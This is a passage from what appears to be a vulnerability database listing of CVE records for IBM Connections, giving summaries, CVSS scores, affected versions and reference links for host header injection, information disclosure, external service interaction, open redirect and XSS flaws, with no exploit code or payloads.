      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-05T04:14:38.748Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "name": "ibm-connections-cve20181896-head-injection(152456)",
                "tags": [
                  "vdb-entry",
                  "x_refsource_XF",
                  "x_transferred"
                ],
                "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/152456"
              },
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "https://www.ibm.com/support/docview.wss?uid=ibm10742567"
              },
              {
                "name": "106197",
                "tags": [
                  "vdb-entry",
                  "x_refsource_BID",
                  "x_transferred"
                ],
                "url": "http://www.securityfocus.com/bid/106197"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "Connections",
              "vendor": "IBM",
              "versions": [
                {
                  "status": "affected",
                  "version": "5.0"
                },
                {
                  "status": "affected",
                  "version": "5.5"
                },
                {
                  "status": "affected",
                  "version": "6.0"
                }
              ]
            }
          ],
          "datePublic": "2018-12-05T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "IBM Connections 5.0, 5.5, and 6.0 is vulnerable to possible host header injection attack that could cause navigation to the attacker\u0027s domain. IBM X-Force ID: 152456."
            }
          ],
          "metrics": [
            {
              "cvssV3_0": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 4.6,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitCodeMaturity": "UNPROVEN",
                "integrityImpact": "LOW",
                "privilegesRequired": "LOW",
                "remediationLevel": "OFFICIAL_FIX",
                "reportConfidence": "CONFIRMED",
                "scope": "UNCHANGED",
                "temporalScore": 4,
                "temporalSeverity": "MEDIUM",
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.0/A:N/AC:L/AV:N/C:L/I:L/PR:L/S:U/UI:R/E:U/RC:C/RL:O",
                "version": "3.0"
              }
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Gain Access",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2018-12-14T10:57:02.000Z",
            "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
            "shortName": "ibm"
          },
          "references": [
            {
              "name": "ibm-connections-cve20181896-head-injection(152456)",
              "tags": [
                "vdb-entry",
                "x_refsource_XF"
              ],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/152456"
            },
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "https://www.ibm.com/support/docview.wss?uid=ibm10742567"
            },
            {
              "name": "106197",
              "tags": [
                "vdb-entry",
                "x_refsource_BID"
              ],
              "url": "http://www.securityfocus.com/bid/106197"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "psirt@us.ibm.com",
              "DATE_PUBLIC": "2018-12-05T00:00:00",
              "ID": "CVE-2018-1896",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "Connections",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "5.0"
                              },
                              {
                                "version_value": "5.5"
                              },
                              {
                                "version_value": "6.0"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "IBM"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "IBM Connections 5.0, 5.5, and 6.0 is vulnerable to possible host header injection attack that could cause navigation to the attacker\u0027s domain. IBM X-Force ID: 152456."
                }
              ]
            },
            "impact": {
              "cvssv3": {
                "BM": {
                  "A": "N",
                  "AC": "L",
                  "AV": "N",
                  "C": "L",
                  "I": "L",
                  "PR": "L",
                  "S": "U",
                  "UI": "R"
                },
                "TM": {
                  "E": "U",
                  "RC": "C",
                  "RL": "O"
                }
              }
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "Gain Access"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "ibm-connections-cve20181896-head-injection(152456)",
                  "refsource": "XF",
                  "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/152456"
                },
                {
                  "name": "https://www.ibm.com/support/docview.wss?uid=ibm10742567",
                  "refsource": "CONFIRM",
                  "url": "https://www.ibm.com/support/docview.wss?uid=ibm10742567"
                },
                {
                  "name": "106197",
                  "refsource": "BID",
                  "url": "http://www.securityfocus.com/bid/106197"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
        "assignerShortName": "ibm",
        "cveId": "CVE-2018-1896",
        "datePublished": "2018-12-07T16:00:00.000Z",
        "dateReserved": "2017-12-13T00:00:00.000Z",
        "dateUpdated": "2024-09-16T22:25:00.146Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2018-1935 (GCVE-0-2018-1935)

    Vulnerability from cvelistv5 – Published: 2018-12-06 14:00 – Updated: 2024-09-17 01:01
    VLAI
    Summary
    IBM Connections 5.0, 5.5, and 6.0 could allow an authenticated user to obtain sensitive information from invalid request error messages. IBM X-Force ID: 153315.
    CWE
    • Obtain Information
    Assigner
    ibm
    References
    Impacted products
    Vendor Product Version
    IBM Connections Affected: 5.0
    Affected: 5.5
    Affected: 6.0
    Create a notification for this product.
    Date Public
    2018-12-03 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-05T04:14:39.563Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "https://www.ibm.com/support/docview.wss?uid=ibm10742575"
              },
              {
                "name": "ibm-connections-cve20181935-info-disc(153315)",
                "tags": [
                  "vdb-entry",
                  "x_refsource_XF",
                  "x_transferred"
                ],
                "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/153315"
              },
              {
                "name": "106134",
                "tags": [
                  "vdb-entry",
                  "x_refsource_BID",
                  "x_transferred"
                ],
                "url": "http://www.securityfocus.com/bid/106134"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "Connections",
              "vendor": "IBM",
              "versions": [
                {
                  "status": "affected",
                  "version": "5.0"
                },
                {
                  "status": "affected",
                  "version": "5.5"
                },
                {
                  "status": "affected",
                  "version": "6.0"
                }
              ]
            }
          ],
          "datePublic": "2018-12-03T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "IBM Connections 5.0, 5.5, and 6.0 could allow an authenticated user to obtain sensitive information from invalid request error messages. IBM X-Force ID: 153315."
            }
          ],
          "metrics": [
            {
              "cvssV3_0": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitCodeMaturity": "UNPROVEN",
                "integrityImpact": "NONE",
                "privilegesRequired": "LOW",
                "remediationLevel": "OFFICIAL_FIX",
                "reportConfidence": "CONFIRMED",
                "scope": "UNCHANGED",
                "temporalScore": 3.8,
                "temporalSeverity": "LOW",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/A:N/AC:L/AV:N/C:L/I:N/PR:L/S:U/UI:N/E:U/RC:C/RL:O",
                "version": "3.0"
              }
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Obtain Information",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2018-12-07T10:57:01.000Z",
            "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
            "shortName": "ibm"
          },
          "references": [
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "https://www.ibm.com/support/docview.wss?uid=ibm10742575"
            },
            {
              "name": "ibm-connections-cve20181935-info-disc(153315)",
              "tags": [
                "vdb-entry",
                "x_refsource_XF"
              ],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/153315"
            },
            {
              "name": "106134",
              "tags": [
                "vdb-entry",
                "x_refsource_BID"
              ],
              "url": "http://www.securityfocus.com/bid/106134"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "psirt@us.ibm.com",
              "DATE_PUBLIC": "2018-12-03T00:00:00",
              "ID": "CVE-2018-1935",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "Connections",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "5.0"
                              },
                              {
                                "version_value": "5.5"
                              },
                              {
                                "version_value": "6.0"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "IBM"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "IBM Connections 5.0, 5.5, and 6.0 could allow an authenticated user to obtain sensitive information from invalid request error messages. IBM X-Force ID: 153315."
                }
              ]
            },
            "impact": {
              "cvssv3": {
                "BM": {
                  "A": "N",
                  "AC": "L",
                  "AV": "N",
                  "C": "L",
                  "I": "N",
                  "PR": "L",
                  "S": "U",
                  "UI": "N"
                },
                "TM": {
                  "E": "U",
                  "RC": "C",
                  "RL": "O"
                }
              }
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "Obtain Information"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "https://www.ibm.com/support/docview.wss?uid=ibm10742575",
                  "refsource": "CONFIRM",
                  "url": "https://www.ibm.com/support/docview.wss?uid=ibm10742575"
                },
                {
                  "name": "ibm-connections-cve20181935-info-disc(153315)",
                  "refsource": "XF",
                  "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/153315"
                },
                {
                  "name": "106134",
                  "refsource": "BID",
                  "url": "http://www.securityfocus.com/bid/106134"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
        "assignerShortName": "ibm",
        "cveId": "CVE-2018-1935",
        "datePublished": "2018-12-06T14:00:00.000Z",
        "dateReserved": "2017-12-13T00:00:00.000Z",
        "dateUpdated": "2024-09-17T01:01:51.214Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2018-1791 (GCVE-0-2018-1791)

    Vulnerability from cvelistv5 – Published: 2018-09-14 12:00 – Updated: 2024-09-17 01:56
    VLAI
    Summary
    IBM Connections 5.0, 5.5, and 6.0 is vulnerable to an External Service Interaction attack, caused by improper validation of a request property. By submitting suitable payloads, an attacker could exploit this vulnerability to induce the Connections server to attack other systems. IBM X-Force ID: 148946.
    CWE
    • Gain Access
    Assigner
    ibm
    References
    Impacted products
    Vendor Product Version
    IBM Connections Affected: 5.0
    Affected: 5.5
    Affected: 6.0
    Create a notification for this product.
    Date Public
    2018-09-12 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-05T04:07:44.486Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "https://www.ibm.com/support/docview.wss?uid=ibm10731207"
              },
              {
                "name": "ibm-connections-cve20181791-esi(148946)",
                "tags": [
                  "vdb-entry",
                  "x_refsource_XF",
                  "x_transferred"
                ],
                "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/148946"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "Connections",
              "vendor": "IBM",
              "versions": [
                {
                  "status": "affected",
                  "version": "5.0"
                },
                {
                  "status": "affected",
                  "version": "5.5"
                },
                {
                  "status": "affected",
                  "version": "6.0"
                }
              ]
            }
          ],
          "datePublic": "2018-09-12T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "IBM Connections 5.0, 5.5, and 6.0 is vulnerable to an External Service Interaction attack, caused by improper validation of a request property. By submitting suitable payloads, an attacker could exploit this vulnerability to induce the Connections server to attack other systems. IBM X-Force ID: 148946."
            }
          ],
          "metrics": [
            {
              "cvssV3_0": {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "availabilityImpact": "LOW",
                "baseScore": 4.9,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitCodeMaturity": "UNPROVEN",
                "integrityImpact": "NONE",
                "privilegesRequired": "LOW",
                "remediationLevel": "OFFICIAL_FIX",
                "reportConfidence": "CONFIRMED",
                "scope": "CHANGED",
                "temporalScore": 4.3,
                "temporalSeverity": "MEDIUM",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/A:L/AC:H/AV:N/C:L/I:N/PR:L/S:C/UI:N/E:U/RC:C/RL:O",
                "version": "3.0"
              }
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Gain Access",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2018-09-14T11:57:01.000Z",
            "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
            "shortName": "ibm"
          },
          "references": [
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "https://www.ibm.com/support/docview.wss?uid=ibm10731207"
            },
            {
              "name": "ibm-connections-cve20181791-esi(148946)",
              "tags": [
                "vdb-entry",
                "x_refsource_XF"
              ],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/148946"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "psirt@us.ibm.com",
              "DATE_PUBLIC": "2018-09-12T00:00:00",
              "ID": "CVE-2018-1791",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "Connections",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "5.0"
                              },
                              {
                                "version_value": "5.5"
                              },
                              {
                                "version_value": "6.0"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "IBM"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "IBM Connections 5.0, 5.5, and 6.0 is vulnerable to an External Service Interaction attack, caused by improper validation of a request property. By submitting suitable payloads, an attacker could exploit this vulnerability to induce the Connections server to attack other systems. IBM X-Force ID: 148946."
                }
              ]
            },
            "impact": {
              "cvssv3": {
                "BM": {
                  "A": "L",
                  "AC": "H",
                  "AV": "N",
                  "C": "L",
                  "I": "N",
                  "PR": "L",
                  "S": "C",
                  "UI": "N"
                },
                "TM": {
                  "E": "U",
                  "RC": "C",
                  "RL": "O"
                }
              }
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "Gain Access"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "https://www.ibm.com/support/docview.wss?uid=ibm10731207",
                  "refsource": "CONFIRM",
                  "url": "https://www.ibm.com/support/docview.wss?uid=ibm10731207"
                },
                {
                  "name": "ibm-connections-cve20181791-esi(148946)",
                  "refsource": "XF",
                  "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/148946"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
        "assignerShortName": "ibm",
        "cveId": "CVE-2018-1791",
        "datePublished": "2018-09-14T12:00:00.000Z",
        "dateReserved": "2017-12-13T00:00:00.000Z",
        "dateUpdated": "2024-09-17T01:56:13.984Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2017-1748 (GCVE-0-2017-1748)

    Vulnerability from cvelistv5 – Published: 2018-06-04 17:00 – Updated: 2024-09-16 19:00
    VLAI
    Summary
    IBM Connections 5.0, 5.5, and 6.0 could allow a remote attacker to conduct phishing attacks, using an open redirect attack. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to spoof the URL displayed to redirect a user to a malicious Web site that would appear to be trusted. This could allow the attacker to obtain highly sensitive information or conduct further attacks against the victim. IBM X-Force ID: 135521.
    CWE
    • Gain Access
    Assigner
    ibm
    References
    Impacted products
    Vendor Product Version
    IBM Connections Affected: 5.0
    Affected: 5.5
    Affected: 6.0
    Create a notification for this product.
    Date Public
    2018-05-30 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-05T13:39:32.334Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "http://www.ibm.com/support/docview.wss?uid=swg22016698"
              },
              {
                "name": "ibm-connections-cve20171748-open-redirect(135521)",
                "tags": [
                  "vdb-entry",
                  "x_refsource_XF",
                  "x_transferred"
                ],
                "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/135521"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "Connections",
              "vendor": "IBM",
              "versions": [
                {
                  "status": "affected",
                  "version": "5.0"
                },
                {
                  "status": "affected",
                  "version": "5.5"
                },
                {
                  "status": "affected",
                  "version": "6.0"
                }
              ]
            }
          ],
          "datePublic": "2018-05-30T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "IBM Connections 5.0, 5.5, and 6.0 could allow a remote attacker to conduct phishing attacks, using an open redirect attack. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to spoof the URL displayed to redirect a user to a malicious Web site that would appear to be trusted. This could allow the attacker to obtain highly sensitive information or conduct further attacks against the victim. IBM X-Force ID: 135521."
            }
          ],
          "metrics": [
            {
              "cvssV3_0": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 6.8,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "NONE",
                "exploitCodeMaturity": "UNPROVEN",
                "integrityImpact": "HIGH",
                "privilegesRequired": "LOW",
                "remediationLevel": "OFFICIAL_FIX",
                "reportConfidence": "CONFIRMED",
                "scope": "CHANGED",
                "temporalScore": 5.9,
                "temporalSeverity": "MEDIUM",
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.0/A:N/AC:L/AV:N/C:N/I:H/PR:L/S:C/UI:R/E:U/RC:C/RL:O",
                "version": "3.0"
              }
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Gain Access",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2018-06-04T16:57:01.000Z",
            "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
            "shortName": "ibm"
          },
          "references": [
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "http://www.ibm.com/support/docview.wss?uid=swg22016698"
            },
            {
              "name": "ibm-connections-cve20171748-open-redirect(135521)",
              "tags": [
                "vdb-entry",
                "x_refsource_XF"
              ],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/135521"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "psirt@us.ibm.com",
              "DATE_PUBLIC": "2018-05-30T00:00:00",
              "ID": "CVE-2017-1748",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "Connections",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "5.0"
                              },
                              {
                                "version_value": "5.5"
                              },
                              {
                                "version_value": "6.0"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "IBM"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "IBM Connections 5.0, 5.5, and 6.0 could allow a remote attacker to conduct phishing attacks, using an open redirect attack. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to spoof the URL displayed to redirect a user to a malicious Web site that would appear to be trusted. This could allow the attacker to obtain highly sensitive information or conduct further attacks against the victim. IBM X-Force ID: 135521."
                }
              ]
            },
            "impact": {
              "cvssv3": {
                "BM": {
                  "A": "N",
                  "AC": "L",
                  "AV": "N",
                  "C": "N",
                  "I": "H",
                  "PR": "L",
                  "S": "C",
                  "UI": "R"
                },
                "TM": {
                  "E": "U",
                  "RC": "C",
                  "RL": "O"
                }
              }
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "Gain Access"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "http://www.ibm.com/support/docview.wss?uid=swg22016698",
                  "refsource": "CONFIRM",
                  "url": "http://www.ibm.com/support/docview.wss?uid=swg22016698"
                },
                {
                  "name": "ibm-connections-cve20171748-open-redirect(135521)",
                  "refsource": "XF",
                  "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/135521"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
        "assignerShortName": "ibm",
        "cveId": "CVE-2017-1748",
        "datePublished": "2018-06-04T17:00:00.000Z",
        "dateReserved": "2016-11-30T00:00:00.000Z",
        "dateUpdated": "2024-09-16T19:00:52.157Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2015-7458 (GCVE-0-2015-7458)

    Vulnerability from cvelistv5 – Published: 2018-03-20 21:00 – Updated: 2024-08-06 07:51
    VLAI
    Summary
    Cross-site scripting (XSS) vulnerability in IBM Connections 3.0.1.1 and earlier, 4.0, 4.5, and 5.0 before CR4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. IBM X-Force ID: 108354.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    ibm
    References
    Date Public
    2016-04-14 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-06T07:51:27.607Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980518"
              },
              {
                "name": "ibm-connections-cve20157458-xss(108354)",
                "tags": [
                  "vdb-entry",
                  "x_refsource_XF",
                  "x_transferred"
                ],
                "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/108354"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "datePublic": "2016-04-14T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "Cross-site scripting (XSS) vulnerability in IBM Connections 3.0.1.1 and earlier, 4.0, 4.5, and 5.0 before CR4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. IBM X-Force ID: 108354."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2018-03-20T20:57:01.000Z",
            "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
            "shortName": "ibm"
          },
          "references": [
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980518"
            },
            {
              "name": "ibm-connections-cve20157458-xss(108354)",
              "tags": [
                "vdb-entry",
                "x_refsource_XF"
              ],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/108354"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "psirt@us.ibm.com",
              "ID": "CVE-2015-7458",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Cross-site scripting (XSS) vulnerability in IBM Connections 3.0.1.1 and earlier, 4.0, 4.5, and 5.0 before CR4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. IBM X-Force ID: 108354."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "http://www-01.ibm.com/support/docview.wss?uid=swg21980518",
                  "refsource": "CONFIRM",
                  "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980518"
                },
                {
                  "name": "ibm-connections-cve20157458-xss(108354)",
                  "refsource": "XF",
                  "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/108354"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
        "assignerShortName": "ibm",
        "cveId": "CVE-2015-7458",
        "datePublished": "2018-03-20T21:00:00.000Z",
        "dateReserved": "2015-09-29T00:00:00.000Z",
        "dateUpdated": "2024-08-06T07:51:27.607Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2015-7459 (GCVE-0-2015-7459)

    Vulnerability from cvelistv5 – Published: 2018-03-20 21:00 – Updated: 2024-08-06 07:51
    VLAI
    Summary
    Cross-site scripting (XSS) vulnerability in IBM Connections 3.0.1.1 and earlier, 4.0, 4.5, and 5.0 before CR4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. IBM X-Force ID: 108355.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    ibm
    References
    Date Public
    2016-04-14 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-06T07:51:27.580Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980518"
              },
              {
                "name": "ibm-connections-cve20157459-xss(108355)",
                "tags": [
                  "vdb-entry",
                  "x_refsource_XF",
                  "x_transferred"
                ],
                "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/108355"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "datePublic": "2016-04-14T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "Cross-site scripting (XSS) vulnerability in IBM Connections 3.0.1.1 and earlier, 4.0, 4.5, and 5.0 before CR4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. IBM X-Force ID: 108355."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2018-03-20T20:57:01.000Z",
            "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
            "shortName": "ibm"
          },
          "references": [
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980518"
            },
            {
              "name": "ibm-connections-cve20157459-xss(108355)",
              "tags": [
                "vdb-entry",
                "x_refsource_XF"
              ],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/108355"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "psirt@us.ibm.com",
              "ID": "CVE-2015-7459",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Cross-site scripting (XSS) vulnerability in IBM Connections 3.0.1.1 and earlier, 4.0, 4.5, and 5.0 before CR4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. IBM X-Force ID: 108355."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
